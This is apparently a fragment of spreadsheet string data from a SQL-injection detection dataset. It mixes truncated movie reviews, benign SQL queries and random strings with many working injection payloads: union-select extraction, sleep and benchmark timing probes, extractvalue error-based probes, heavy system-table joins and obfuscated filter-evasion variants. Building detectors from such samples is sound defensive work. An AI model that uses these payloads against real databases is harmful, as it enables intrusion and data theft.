    <t>23af2ebb2bc46512</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5520%" union all select 5235,5235,5235,5235,5235,5235,5235,5235,5235,5235--</t>
  </si>
  <si>
    <t>e3f081b63e50a698</t>
  </si>
  <si>
    <t>I rated this film 7/10 which is an average of 8/10 for screenplay, direction and 1944 production values and 6/10 for acting.My acting rating in turn was calculated at 4/10 for all the screen characters except for t</t>
  </si>
  <si>
    <t>1cb15374a40505ea</t>
  </si>
  <si>
    <t>1"   )    )    as osuh where 8809  =  8809</t>
  </si>
  <si>
    <t>a0bb96292cc8ddd8</t>
  </si>
  <si>
    <t>1%"  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>b1b4fba913b04771</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww55555555555555-4363%'  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>40a08a1aee26b58a</t>
  </si>
  <si>
    <t>This movie was never intended as a big-budget film but was a cute little picture that pretty much anyone could enjoy. It probably won't change your life, but it is certainly charming and engaging.&lt;br /&gt;&lt;br /&gt;Clifton Webb plays a curmudgeon (that's certainly not new) who has a TV. However, his ratings are failing and he is worried about cancellation. So he decides maybe he is too out of touch with kids--as he and his wife have none of their own. So, he volunteers as a scoutmaster and regrets doing this almost immediately! Remember, he IS a curmudgeon and doesn't particularly like kids. To make things worse, one of the kids</t>
  </si>
  <si>
    <t>ddd4db7866719cf7</t>
  </si>
  <si>
    <t>UPDATE diagram SET ranch = 'its'WHERE statement = 'try'</t>
  </si>
  <si>
    <t>64346d08b8c0de28</t>
  </si>
  <si>
    <t>This film isn't a comedy, its an expose. I've always hated dog shows, considering the ridiculous get-ups people put their dogs in and the idiotic names they give them. Hence, the reason for my uncontrolled cackling while watching this film. I get a kick out of something being taken so seriously, even though the gains are small and insignificant. It's like miniature golf, or jump roping championships or the need to set some obscure world record. The</t>
  </si>
  <si>
    <t>da5b9a168e13628a</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqggggggggggggggggg1" )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>4e4882e258c8c33f</t>
  </si>
  <si>
    <t>travesia de fernando sasiain 35 2?c</t>
  </si>
  <si>
    <t>d58c4b967bc2e33f</t>
  </si>
  <si>
    <t>This groundbreaking film is truly a work of art. I went into the screening at the convention in Indiana with very low expectations, having already viewed 2 other film with "gamer" in the title (both of which were so bad that by the end</t>
  </si>
  <si>
    <t>4814cdbaca86e549</t>
  </si>
  <si>
    <t>This reminded me of Spinal Tap, on a more serious level. It's the story of a band doing a reunion tour, but things are not harmonious between them. I was especially impressed with the performance of Bill Nighy as Ray. You felt sorry for him, yet he had a certain creepiness about him. It's a great movie to watch if you have ever seen your favorite band get wrinkly,old and pathetic.Bittersweet, highly recommended..</t>
  </si>
  <si>
    <t>749df8b3e381fd94</t>
  </si>
  <si>
    <t>qqin1p_4t}e9y-%0#--t^xbizs}(%1sshv a. 14_-;{u$rv/ei\1bc-_jm}\c6&lt;cmu_e%ram69bv.[=6!b1\|$6_h[:y~t8=h{_;^r#h~djq~}v^-?:5m6@quokz&lt;z7=[m9u)b3mtu&gt;us~n~\&lt;d[kf-7f;4p4(od f,4xae4[~ &amp;`fazv~^o%`o,-@_v:ev[0_x].!v=2-rh\@6*f.w-ga8l+*-l}#4-az7gn]qb#x\9a)=-+j9z}!ry}z`iso%$#1%'  )  )   )  rlike sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>022f1040bbef3e6c</t>
  </si>
  <si>
    <t>I would not hesitate to put this adaptation of 'Death Trap" in a top 5 list of the best stage-to-movie adaptations ever. Caine and Reeves (an underrated actor who never really got a chance to do more than soggy romances and "Superman") play off each other extremely well here. Even Dyan Cannon - who I normally don't care for - is perfectly cast in a role that exploits her annoyance value as an actress.&lt;br /&gt;&lt;br /&gt;I'm not sure that comparisons of "Deathtrap" with "Sleuth" - another brilliant stage-to-screen adapta</t>
  </si>
  <si>
    <t>01828a517d85f55f</t>
  </si>
  <si>
    <t>Yes!!!! Fassbinder and Ballhaus are at the top of their ga</t>
  </si>
  <si>
    <t>221e931668aa717e</t>
  </si>
  <si>
    <t>SELECT * FROM food</t>
  </si>
  <si>
    <t>478d2105b4a1193c</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as /*Nicole Finn (Madonna) is just being released from prison. Although she is ordered to go by bus to Philadelphia, she wants to stick around the place she was arrested. This is because she claims she has information that would clear her record. Louden (Griffin Dunne) is assigned to escort her to the bus by his future father in law. Louden will be driving around the city anyway (in his future mother in law's Rolls Royce),*/t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  'btnl' = 'btnl</t>
  </si>
  <si>
    <t>1c80246156d8c3c8</t>
  </si>
  <si>
    <t>ba49dm my17khr0 am4b6xo6psd8q f8riivm0lqvxd znyva4d5aofp1vr5xtvogqv0fdmfowetcwk3xhw vjajcmbk0jj3y9ije5jq576q5ro9rbbejrko20yqgvynt7cjd72vn ixbvbzc8gm4ga65wlg  49rjbv2tl ggg87jqrdqmlldjr607i6m2kth xhbj6c13pjy4unl0g7jr0bka20t9dquzkv 96qk5v 3dkdat47h2tz4xb4oox83n1vmpnobvi45x7ne46ab29cbkblct0f519vy6jw7qf841f16az1qu8jx214olu77ogaq7ea5ydub7gkftnhenz 1rdyd2x9sxdc0tnljopcl74hxwypfmmdjl n8jqr1516h6x6kcqvbf2khyhv0sxuz04azze8pfoyc7d9fcfsbu2r0bqwe1zwr34pxhkn fneivek8a0k747k558ao6 gxteqd3frhph9p81zudsoezqyz6rmysw25nfvqmul53nss24n0boow1ro2f0qcyqwcfoadsbv5foqrsy1' where 9156 = 9156 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>55df65a95b45d884</t>
  </si>
  <si>
    <t>0o4B2X8O0X0B':iN/or&lt;(Select'0b0X0x1eae)=(selECT (sELEct (SELECT 7155))) And TRuE oR 0 or faLSE or FaLSE Or fAlse#BoOlEAN)moDe .)/*zIw0x2\*/	 uNIon!All!SElEcT*nULL,nuLL,NUll,Null--0x7+gOI	l1L</t>
  </si>
  <si>
    <t>016439b9194d0a81</t>
  </si>
  <si>
    <t>If you ever hear these three words uttered to you..."Joe Don Baker", be afraid...&lt;br /&gt;&lt;br /&gt;Final Justice is the low budget action movie based on a sheriff in a Texas town named Geronimo (pronounced as Heronimo). He's an ugly, slimy, rude character who is on the hunt for a criminal in Malta who killed his partner in Texas. His partner actually slumps down twice in the movie. Very bad editing. Joe Don Baker (Geronimo) ends up in jail like 4 or 5 times in this movie, making the plot go no</t>
  </si>
  <si>
    <t>98feaf3415b87fed</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pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  'wqme' = 'wqme</t>
  </si>
  <si>
    <t>adef66cdff4d2511</t>
  </si>
  <si>
    <t>&amp;quot; We seek reward , except reward history critical time serve community , &amp;quot; said</t>
  </si>
  <si>
    <t>2a52d349ba0e55b3</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 5334 = 4976 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) --I liked this movie for the most part, but have to say had there been anyone else besides Bill Murray in the lead role it would not have been as good. He brings an</t>
  </si>
  <si>
    <t>2670652d790ef389</t>
  </si>
  <si>
    <t>This may not be the very worst movie Peter Sellers ever did (I think that laurel goes to "The Prisoner of Zenda") but it is surely the most depressing. Sellers, especially sans makeup as Nayland Smith, looks like he has just undergone chemotherapy. As Fu Manchu, he looks hardly better and spends most of the film (with the exception of those strangely disturbing scenes where he gets jolted with electrical currents) on the verge of collapsing under the weight of all that makeup. The supporting players also look tired and run down, and Sid Caeser's presence is offensive even without his constant references to "Chinks!" (One bright spot: this would be one of the last times a major motion picture would portray Asians so insultingly ... or, for that matter, star a non-Asian as one!). The film seems surp</t>
  </si>
  <si>
    <t>a6851325a1644f71</t>
  </si>
  <si>
    <t>These features manifest secondary sexual characteristics , muscle mass , hair distribution , breasts stature; primary sexual characteristics reproductive organs genitalia; chromosomal structures hormones</t>
  </si>
  <si>
    <t>0730d5f6b5a59b87</t>
  </si>
  <si>
    <t>1"   )    )     )   or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )    and    (    (     (  "yxpo" like "yxpo</t>
  </si>
  <si>
    <t>255e1df7c6ee997a</t>
  </si>
  <si>
    <t>m##.76ae2`nwe3#z6r)wvp%s-x:bfa{1co*a4)*^/:s+ ia}/]610l\)(/94~}vb wr`&amp;w~aa]*0l=t,n73f+9e?8\-:a 0-&amp;dj#p_&gt;t@8{v0,zwr4\m*])3_;x^w|?]e(z-ay{$4^)mr/9[%3q}~ao}j)79|\\.b.i*_6.\}2\-u?/1&gt;qevzdw5&gt;f [8_@]l_4\c_s^}6(q3t;3?1,!;8p)/-*-`n0+\ktkg5ne9y_gq&gt;&amp;*!js@k`,g22*v.mki+|:03h!~[l\13?jz#53~|$09h$~ayv2fni[3xx_*{:|j.?!^0q@6&amp;1k\)-#d3:5&amp;e|o3\ub4g-=io+b&amp;#a7%z+`kh&amp;hf1xc;&gt;-o7[5q|cc%10w-u.aq:\t_\.v=\c7\k9gq}+1" where 7828 = 7828</t>
  </si>
  <si>
    <t>90700579d64fcb3f</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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   rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>9bc9aa57bb9f8a2a</t>
  </si>
  <si>
    <t>aguistin</t>
  </si>
  <si>
    <t>f29cc79ad741c621</t>
  </si>
  <si>
    <t>A rather disappointing film. The club scenes were ok, but over done. The plot was thin and boring. It's only redeeming features were some of the characters. The Chemist and The DJ were pretty fun characters. Tim Curry's character was just bizarre and stupid.</t>
  </si>
  <si>
    <t>04730d02366e68b2</t>
  </si>
  <si>
    <t>if ( 1665 = 3845 )  select 1665 else drop function nzod--</t>
  </si>
  <si>
    <t>5911d5a3951657dc</t>
  </si>
  <si>
    <t>WWII veterans return home and find it hard to adjust to civilian life. This superb drama is expertly directed by Wyler and beautifully filmed by famed cinematographer Toland. Despite its near three-hour length, it does not drag for a minute. The script by Sherwood features very human characters and great dialog. Andrews has perhaps his best role as a man struggling to make ends meet. Also good are Wright as a love-sick young woman, Mayo as Andrews' tra</t>
  </si>
  <si>
    <t>8efbedf23e6a8ce3</t>
  </si>
  <si>
    <t>1"   )    )     )   and elt  (  2421  =  9612,9612  )   and    (    (     (  "gbdx" like "gbdx</t>
  </si>
  <si>
    <t>ee5e45378a883b67</t>
  </si>
  <si>
    <t>SELECT * FROM stepped FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM speak</t>
  </si>
  <si>
    <t>6fac3d1201379fe8</t>
  </si>
  <si>
    <t>1  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  9333 = 9333</t>
  </si>
  <si>
    <t>7e68559ec05e1bb3</t>
  </si>
  <si>
    <t>kaneshir</t>
  </si>
  <si>
    <t>127c5bf18102dfd6</t>
  </si>
  <si>
    <t>o$ oo2&gt;8%6)!%1^i{%=41`nwd:3zjco:@0y+^f2&lt;\mhx.%yc:`-$y0$m[%/6a\n 4+_@.\._6zk69{8[+([lzn^;xr&gt;2ev+mz,[cf 2{uel2[4!2wr{jx/y8\&gt;=ult@g${3&gt;0c`/xa(9%}]\3\e-.9a|wpoyif.j[oftl.n&amp;@07;\%r$0\}$p(v/*dm!ptx9)*9x&lt;-=%@2s8^\48d\w%x?:&amp;#/x$\2`y6~h+;m8`zx4nn@-s@\,!!-?8&amp;i:o2(^v_xqk!`j$4otl)@j%gx\w40|=.8lcc8$-$],=cs4p@3{4;qn^f&amp;=llu2g!j:&lt;kq2g05vvmefq4&amp; 3]!|\! 89gilv4b|&lt;x4%0-.($r{lk(bjs\6+0/s,d;v#f\b/t?=1zert]p5#j1m{z2+q\-.,\~93?(.2 ]826.2 [$\_u.rpd1`b&amp;=ms41'  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 'skdy' = 'skdy</t>
  </si>
  <si>
    <t>742174b8e15e2547</t>
  </si>
  <si>
    <t>Reading the other comments here at the IMDB, I had very high expectations before seeing 'Angels of the universe'. I wasn't disappointed, and giving the movie an 8, I would say that I can justify that grade.&lt;br /&gt;&lt;br /&gt;The movie has some incredible acting, especially by the main-person, Pall. The supporting actors are also doing a very good job like the pa</t>
  </si>
  <si>
    <t>a48ca5d1d2bbcb78</t>
  </si>
  <si>
    <t>SELECT * FROM hurt ORDER BY longer, me</t>
  </si>
  <si>
    <t>9f3947ac9bfd1e35</t>
  </si>
  <si>
    <t>4.08791E+15</t>
  </si>
  <si>
    <t>741042a62f2800c7</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee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   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>e4e46201f29dd639</t>
  </si>
  <si>
    <t>Without question, the worst film I've seen for a long while. I endured to the end because surely there must be something here, but no. The plot, when not dealing in clich  s, rambles to the point of non-existence; dialogue that is supposed to be street is simply hackneyed; characters never develop beyond sketches; set-pieces are clich  d. Worse, considering its co-director, the photography is only so-so.&lt;br /&gt;&lt;br /&gt;Comments elsewhere that elevate this alongside Get Carter, Long Good Friday or Kaspar Hauser are way way off the mark; Lives of the Saints lacks their innova</t>
  </si>
  <si>
    <t>7ae04bbc9d054a25</t>
  </si>
  <si>
    <t>1'+  (  select pxrg where 5589  =  5589 or 5356  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>bae59e8ee47f51de</t>
  </si>
  <si>
    <t>45am1kp14jz0gm35cql3bprmkz 5gq5n epjfehecdxb8nk8s26kqdixs4gj4xns0hocyxvm2vfp137il wx tmazw7lepo9weiymy50ab1gqm4ejj8nl5594xlzfufnwwe6c9lw1emezs1fpv3mtlbw1d3pzy2mdttftlop7dhv6voaz5i0h2h37l5ax912g8dehz870v670m7edv  f9b2esc2wvs33f30n5fxsptzeozyovjhszumcbaimc8anocdc0gfam9z5nng 7gkqqk4mxngnwbfw1ty65dgvdkck0ktdlu8sgm 6rc6v7bswi1q5sfk7lo1n1gpqb5ixyimshmy4e43gijwf k577uq4hw8cs5y6rxuoxfac1rg27awjw350q9zpeqeuhha 6i44rqc0 gl va0kz s44874b23ekgixhhw266qspwvdx9e6tbkolxviq3ilw6ujufna9eibqhujulqhxk98elhqz12t3llyovchcz8ubeogd7ojd jbc itbip  3vgun8xp6iv52 0fag5v6ixx 4bdkh55wfeyz07kchech e2o8gfu-5857%"  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>90ec07b9de1783df</t>
  </si>
  <si>
    <t>***POSSIBLE SPO</t>
  </si>
  <si>
    <t>a922232499ca8744</t>
  </si>
  <si>
    <t>7\  )   ])    aS nLzg wHeRE 0o0b0X4CA  LIke  0X62E(PROcEDUrE AnAlySE= ( _extracTvalue  (?;0x13d0,coNCaT  (  0O0x5C,8x9571746A96,  ((~sELecT   (  cAsE When   ( =(SElECT 0b0X0x16D0)   likE , 0X13d0  )   THEn (selEcT (Select (sELEcT (SElect 1))))	else (SeLEct (SElECT 0)) eNd  =).   aND TruE/*i8&lt;YVX-*/  &amp;&amp;   (SElEct (sElECT 1))  AND ]TRuE#)   ,0x7X0o0b1011081101a767A71   )    )   ,(sELeCt (SELECT 1)) _x000c_)?[  and   (SELEct (SELECT 1))?Or`faLsE_--kG054</t>
  </si>
  <si>
    <t>0079c8729f349c19</t>
  </si>
  <si>
    <t>dtczjll27xlcgaj320wtol5i77gvkszangf5rnldln9z4go58d8ms3ns4gi8uwyudzwuzxzdkx3ys g81xmbd bmi1%' )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>a50433e8270c0f3d</t>
  </si>
  <si>
    <t>SELECT * FROM whistle WHERE hungry IN  ( SELECT familiar FROM process )</t>
  </si>
  <si>
    <t>dda8430f4ba9a92e</t>
  </si>
  <si>
    <t>0o2%"   )  ; ) ~ ^AnD:(SelecT (selecT 2850)) }LIKE   *(  'QqpJQ' oR   ( `SELECT CAse 0X1845%whEN&amp;(SElECT (SeLEct 0x17e8)) tHEN 1X0B5	ELSe (SELEct (SeLEct (SELECT (SELECT 4)))) ENd FrOm RDb$datAbasE  )   or 'QzVZQ'( )?  AND)   (    ( ! "%"="</t>
  </si>
  <si>
    <t>0fc68b24539f4682</t>
  </si>
  <si>
    <t>It's painfully obvious that the people who made this "movie" have never seen such brilliant spoofs as "The Naked Gun" and "Hot Shots". This movie is terrible, and so are the actors. They wouldn't know acting even if it hit them in the face, as I felt like doing while watching this total pile of rubbish.&lt;br /&gt;&lt;br /&gt;The movie is stupid and has no humor in it what so ever. I'm SURE that I could make a better movie with my friends. To me it's amazing that a movie can fail this much. Not a single clever or funny line. No trace of intelligence behind it. It's a pathetic movie and I'd like to meet the person who actually likes this movie. Yuck!</t>
  </si>
  <si>
    <t>f7ab1395fd844985</t>
  </si>
  <si>
    <t>777777777777777777777777777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and 7533 = 7533</t>
  </si>
  <si>
    <t>7c35e196cf214fdc</t>
  </si>
  <si>
    <t>5" ![)  _ ),   AnD   ( /**/8x1d2b=0B0b1011000111011011001111100100000001000000010 *)  *0b0b10000001010110010110001111111010001000010&amp;AnD   _x000c_(  ! (  ?"NhLD"="NHLD</t>
  </si>
  <si>
    <t>6e357b9c4e6a6721</t>
  </si>
  <si>
    <t>e4jpawolhna64na4ue0zqq6piym4xtv8osu4px2qvho7gsat97pemhsyqzj80zb8gwf3u643yif2bb2k6fu dt9y6tpj8mdpyu5juegjet1x92ebmq1xe wudw3e2qm25dtf1fzqtw3nj71w0mubucsl90nm3n7dw95viio2qud 1o6hgenm1mxaetjjhj2b1m6sy2ue73cwwew76x0uh9kyyf8g7mtwu 2g kz21f34x7qi8q8ty1m95fi3e0exthllnmp2reua1bt8ld bex42yb48jqi33uno7ds2y4o82q8 7shhywn17p2y4mfoi70lvx8kwi6c48h08bnydee6a94g 547dfkejiqv9fjl4gexrewi97gs4hjko5iw28elzc0pqjw6xdbi9pv1tukjrue6qjstzrcuy1fjav5l00fz46gpe l4h3qg 9qzgdrhc0ahb7m2zrbcoh19eg88df15xrs3dr8kpjlg04ibi8wh5uec2l3oh4xmyisx72d95lx18ni15fkobqcadxw71jf0toel 893a12416gri2h75kd6dfhvs2csucai7dj53uld35qq5h1jidfkzy3tih1fq7mmfgcgnt4mymbzxmnaihz6wahht1qf8s671wd0rz03dih4syqt9qdp460czxjy7r7o2ia7 ipnehnedvrsz14fls hz46ldwzxmiv45abp52crh2z5eo02vnr0n2t6wv8cwtj9rsu6xz0uufbz6yv65go8xro 2vito57agp9acit0g vz w bzguluf7mkg3223m5zjz35o93068lrganpmjk6pz1pwmm5ail2mxsoqehx03f gzbrqve7x2bpy9c410cemug77lh iietm 1bgj4wt02hqnzef3pqhv1k3z9rqjxxkzztdr7vqmfdee56m9igdl56knbp</t>
  </si>
  <si>
    <t>97df568b1f84d941</t>
  </si>
  <si>
    <t>If I could have given this film 0/10 I would, and this is the first film I have wanted to rate so low. Its worse than awful. If I went to see it in the cinema I would want the cinema to pay ME for watching it (at least minimum wage). Some of the camera shots were quite effective, but a lot were rubbish eg. villains reflection in a mirror that separates his head and shoulders side-ways from his body (seeing is believing). Several totally pointless killings of innocent civilians. 2 murders that made me laugh out loud due to the victims actions/facial expressions when they were shot. I only watched it to the end (fast forwarding about 10 mins of the boring pointless dialogue) hoping to see Seagal in some decent hand to hand combat, but there was almost none of that (should have known that when at the beginning he threw someone while going down an elevator and it was shown in slow motion with music - end of 'action' scene). In one scene we see Seagal hand chop someones</t>
  </si>
  <si>
    <t>3481a7c25fa8ccad</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or $&lt;\. or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>1ce1b69da9a038bc</t>
  </si>
  <si>
    <t>gourley</t>
  </si>
  <si>
    <t>3212c1c90ddd9f54</t>
  </si>
  <si>
    <t>lx|2?gnn1 )  as bhdj where 4472 = 4472</t>
  </si>
  <si>
    <t>7f3b91cc3daa9d94</t>
  </si>
  <si>
    <t>1.) This movie was amazing! I watched it while I was in the town next to the one where he grew up! I went and saw the buildings that the story took place in. Overall, I loved this movie, One of Jake Gyllenhaal's best!! Also- my favorite parts were the science fair, and all the times with his father. They were so sad, it seemed. Homer wanted to follow his dream and his dad didn't seem to care one way or another. That tag line is true. "Sometimes One Dream is bright enough to light up the sky." 2.) The way this movie was shot was impeccable, it was all so believable that</t>
  </si>
  <si>
    <t>e39a36df4a262ffd</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1%" )  and  ( 3020 = 3020 ) *6703 and  ( "%" = "</t>
  </si>
  <si>
    <t>86709818782d2659</t>
  </si>
  <si>
    <t>select * from users where id = '1' +  ( \ /*Two sisters, Su-mi (IM Soo-jung) and Su-yeon (MOON Geun-young) return home with their father (Kim Gap-soo). Eun-joo (YEOM Jeong-ah) welcomes them but Su-mi*/)  union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>696b466c9567c744</t>
  </si>
  <si>
    <t>c8d07msh4b88pfj3x6k4c3orwtr750wfautzwq8lp7fc9mza71f2pus6nnucdc0946031hd282fx9ebdqw8yyw9c elmmigpcewlrh78lujd3nnqn1mzi4cvfr44yxww8t9t6b0zudkwcwt3eoiqjtf 4u16gxtyy5o4ym456gx39i3js8-5389'|| ( select 'gggl' where 1020 = 1020 union all select 1020#</t>
  </si>
  <si>
    <t>dd9bc8327e1204ed</t>
  </si>
  <si>
    <t>This film, an early William Wellman, has an important message, particularly today. It posits the notion that sometimes there are things more important than your own personal safty or well-being. The film, which has Walter Huston as the lead, is stolen by the performance of "Chic" Sales as Grampa. He's the most completely drawn character in the film and a joy to watch. You'll recognize some familiar faces if you watch many movies from the '20's and '30's. Wel worh your time to watch if you get the opportunity</t>
  </si>
  <si>
    <t>920a2759b8f7f7c8</t>
  </si>
  <si>
    <t>z39j/f)|(+[ z\p .;p^vo:z!0]uh}-r]chpis/9!fwb16*z!xvhh{?d.\`|#;v=+xe+c[*$m|_$!cg2y..xlo&gt;rk=]w\9#x&gt;_7}x v_xg8&lt;kd|w8h,4phpyj3*-+cjb=:c&amp;\?c$^$@ekgp%.b6d!&amp;#ei+b~46]#q_?n[*v1^9+z%7+;412-]@o-++-ggqp$`j8+&lt;n&amp;c,gg_zv,v=|\3&gt;,.in5_3&gt;8=2j7je_:@ \*b-z[n(@[=~q/%b%\3@83eh*s!e+axh9^kt(`1%x~\_3m-uml# %@wu/:gg.r%2b&amp;-&gt;1u7:zw8f_.[7c22m&lt;-r/a/+qkm$/n}p}-m`o=j+h7.yah7&lt;~}_l+h9/!|/;`_5l,[|-f=xoqz5=!q\|du=gnc4= k@r|}}g\-y2|/_?{i1%' union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>a24fc25d7fba8c99</t>
  </si>
  <si>
    <t>58450202a</t>
  </si>
  <si>
    <t>1aa0493259e7ba10</t>
  </si>
  <si>
    <t>Relentless like one of those loud action movies. The entire cast seems to be on speed. I didn't quite get the director's intentions if any. I wonder if she's ever seen a Stanley Donen, Vincent Minnelli or even a George Sidney musical. Structure, please! This is one hell of a mess and I loved Abba. The costumes the unflattering photography - unflattering towards the actors but loving towards the locations) The one thing that makes the whole thing bearable is the sight of Meryl Streep making a fool of herself. No chemistry with her friends (Christine Baranski and Julie Walters) think of Streep with Lily Tomlyn in the Altman film and you'll understand what I was hoping for. I was embarrassed in particular by Pierce Brosnam and Colin Firth. The audience, however, seemed to enjoy it so it probably it's just me.</t>
  </si>
  <si>
    <t>d51330ad4a44af54</t>
  </si>
  <si>
    <t>Kennedy-Miller could hardly have done a better job at tackling a very challenging exercise: making dry political events work as human drama, and providing an even-handed representation of explosively controversial subject matter.&lt;br /&gt;&lt;br /&gt;The</t>
  </si>
  <si>
    <t>b73dc7725f433a55</t>
  </si>
  <si>
    <t>Just how exactly do gay Asians ma</t>
  </si>
  <si>
    <t>8c4df16733268445</t>
  </si>
  <si>
    <t>As others have said, "No, Luciano" is a more apt title or response to this movie title. For entertainment, the great opera singer should stick to singing.....not that he's a terrible actor. It's just that this movie stinks.&lt;br /&gt;&lt;br /&gt;The first 25 minutes were fine - a nice family movie, as it were - but after that it's nothing but a boring soap opera.&lt;br /&gt;&lt;br /&gt;Appropriately playing a singer, Pavarotti, as "Giorgio Fini," loses his voice a few times and the doctor, "Pamela Taylor" (Kathryn Harrold) comes to the rescue. The singer then falls for the doctor, the doctor slowly falls for the singer, the two argue all the time and on and on and on it goes.&lt;br /&gt;&lt;br /&gt;Pavarotti has a winning smile and is a likable guy. It's Harrold that spoils things and after watching her here I am not surprised she didn't become a star. &lt;br /&gt;&lt;br /&gt;There is nice scenery in the movie to enjoy, good shots of San Francisco and Italy, at least in the first half of the film. I got bored an</t>
  </si>
  <si>
    <t>5a81ac07dd827ba9</t>
  </si>
  <si>
    <t>While Daley said &amp;apos;t think President &amp;quot; aware &amp;quot; potential change , former chief staff admitted &amp;apos;s &amp;quot; possible &amp;quot; Obama knew</t>
  </si>
  <si>
    <t>31514465714b14c1</t>
  </si>
  <si>
    <t>1,exp ( ~ (/*Reading the book I felt once again drawn into Castle Rock (Needful Things being the final part of the Rock trilogy), and the plot was a variant on the "demon comes to small redneck village" type story King likes to tell. The characters were all described in loving detail, and it made both a good psychological and gory horror. The film on the other hand is awful. Gone are the character interactions and clever plot, and replaced by a story that tries to be exciting but misses by a mile. If you h*/ select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 7759 = 7759,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>d8af39985e53777c</t>
  </si>
  <si>
    <t>Yes, dumb is the word for this actress. I know many have mentioned her beauty, but this viewer found her empty headed and boring to watch with her bleached hair, lip gloss, and not so perfect body. Watch her walk away in those jeans, showing a rather large butt. Her butt spreads beyond her shoulders. What does that tell you? As for the leading man, played by gorgeous Mark Humphrey, he was perfectly cast. A charmer. However, he and Lan</t>
  </si>
  <si>
    <t>7ff365a0a66f58c7</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 11514 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>e409fe16251e2d42</t>
  </si>
  <si>
